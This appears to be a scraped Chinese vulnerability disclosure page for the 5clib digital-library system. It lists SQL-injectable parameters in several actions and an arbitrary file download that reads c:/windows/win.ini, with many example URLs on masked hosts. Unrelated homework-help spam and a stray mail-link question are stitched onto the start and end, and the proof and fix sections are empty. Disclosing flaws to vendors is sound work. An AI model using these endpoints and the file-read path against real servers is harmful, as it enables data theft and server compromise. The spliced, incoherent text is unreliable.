谁有学校2015全集邮件中的链接 变 amp速求🙏🙏

分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放(、)
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
详细说明:
 五车信息技术(北京)有限公司一直致力于数字出版领域应用,提供相关产品技术和服务。五车公司掌握的数字 出版核心技术与国际同步,可提供服务主导型模式(SOA)完全解决方 案,实现传统出版物数字化、商用数字内容、互联网文献信息资源的无缝集成,具有全球竞争力。
SQL Injection:
code 区域SQL1:/5clib/bookWeb.action?formAction=bookBrief&pid=???&ccode=**
pid参数存在注入
SQL2:/5clib/ebooksearch.action
或者:/ebook/search.jsp
POST: select=all&keyword=
keyword参数存在注入
SQL3:/5clib/paperWeb.action?formAction=paperDetail&Id=???
Id参数存在注入
SQL4:/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=??&grade=1 classname存在注入 formaction作用也不一样
SQL5:/5clib/newsWebManage.action?formAction=newsDetail&Id=8
Id参数存在注入
任意文件下载:/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini
code 区域第一处案例:
**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebY000b3fa7Y
**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebYY&ccode=009003
http://**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebYY&ccode=
http://**.**.**.**:8081/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0008d42cY&ccode=009
**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0004c8ceY&ccode=017016
第二处案例:
**.**.**.**:8081/5clib/ebooksearch.action
**.**.**.**:8081/5clib/ebooksearch.action
http://**.**.**.**:8081/5clib/ebooksearch.action
http://**.**.**.**:8081/5clib/ebooksearch.action
**.**.**.**:8081/5clib/ebooksearch.action
第三处案例:
**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=666490
http://**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=666490
**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=600976
http://**.**.**.**:8081/paperWeb.action?formAction=paperDetail&Id=531536
**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=666490
第四处案例:
http://**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=%E6%B3%95%E5%BE%8B%E4%B8%93%E4%B8%9A%E8%AE%BA%E6%96%87&grade=1
**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=002&classname=3&grade=1
**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=003&classname=4&grade=1
**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=root&classname=10&grade=1
http://**.**.**.**:8081/paperWeb.action?formAction=paperClass&mark=006&classname=7&grade=1
第五处案例:
http://**.**.**.**:8081/5clib/newsWebManage.action?formAction=newsDetail&Id=8
**.**.**.**:8081/5clib/newsWebManage.action?formAction=newsDetail&Id=1
http://**.**.**.**:8081/newsWebManage.action?formAction=newsDetail&Id=3
http://**.**.**.**:81/newsWebManage.action?formAction=newsDetail&Id=8
**.**.**.**:8081/5clib/newsWebManage.action?formAction=newsDetail&Id=2
第六处案例:
**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini
**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini
http://**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini
http://**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini
**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini
漏洞证明:
code 区域第一处证明:/5clib/bookWeb.action?formAction=bookBrief&pid=???&ccode=**
第二处证明:/5clib/ebooksearch.action
POST: select=all&keyword=
第三处证明:/5clib/paperWeb.action?formAction=paperDetail&Id=???
第四处证明:/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=??&grade=1
第五处证明:/5clib/newsWebManage.action?formAction=newsDetail&Id=8
第六处证明:/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.in
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:13
确认时间: 20:52
厂商回复:
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论,请先把答案写在纸上 大仙们 🙏🙏&#谢谢了 把答案写在纸上 帮帮忙 谢谢了 大仙们 拜托拜托 🙏🙏🙏🙏_百度作业帮
把答案写在纸上 大仙们 🙏🙏&#谢谢了 把答案写在纸上 帮帮忙 谢谢了 大仙们 拜托拜托 🙏🙏🙏🙏
把答案写在纸上 大仙们 🙏🙏&#谢谢了&把答案写在纸上&帮帮忙&谢谢了&大仙们&拜托拜托&🙏🙏🙏🙏
照片里面列出来了,这么写老师绝对不会给你判错的,望采纳

我要回帖

更多关于 邮件中的链接 变 amp 的文章

 

随机推荐